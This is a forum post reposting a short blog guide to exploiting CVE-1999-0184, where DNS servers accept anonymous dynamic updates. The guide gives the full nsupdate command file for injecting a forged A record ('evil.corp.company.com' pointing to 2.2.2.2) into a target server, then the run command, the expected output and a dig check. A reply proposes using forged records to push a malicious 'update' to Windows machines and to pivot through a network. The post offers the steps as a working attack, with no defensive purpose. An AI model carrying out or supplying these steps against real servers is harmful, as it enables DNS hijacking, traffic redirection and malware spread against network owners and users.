Exploiting CVE-1999-0184 DNS Poisoning

[AnarchyAngel]

Yes this CVE is old, but I keep seeing it and there is no real tool or exploit guides available so I thought I would make one up right quick.

This "guide" is for Kali 2 and the basics of whats going on is the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If its not already on your system you can just run apt.

Code: [Select]

apt-get install dnsutilsNow we will need to start with a file that has all our commands in it. It should look something like this:

Code: [Select]

server 1.2.3.4 #our target DNS server
zone corp.company.com #the zone we are working in.
update delete evil.corp.company.com. A #rm just in case.
update add evil.corp.company.com. 86400 IN A 2.2.2.2
show
sendSave the file as dns. Now just run the following command:

Code: [Select]

nsupdate -v dns
nsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Outgoing update query:

Code: [Select]

;; ->>HEADER<<- i="" id:="" nbsp="" noerror="" opcode:="" status:="" update="">
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com.  IN SOA

;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 2.2.2.2Now just run a quick DiG query to make sure it worked.

Code: [Select]

dig @1.2.3.4 A evil.corp.company.com That is all I have for this post. Happy hacking

OP: http://aahideaway.blogspot.com/2015/12/exploiting-cve-1999-0184-dns-poisoning.html

[Pandles7]

Nice, I used another script-kiddie tool for this. I heard that you could fake an update to make all the windows computers on your network to download you malicious "update" - Pretty interesting, this could also be used if you've infected one machine and use it as a pivot to infect the rest of the network.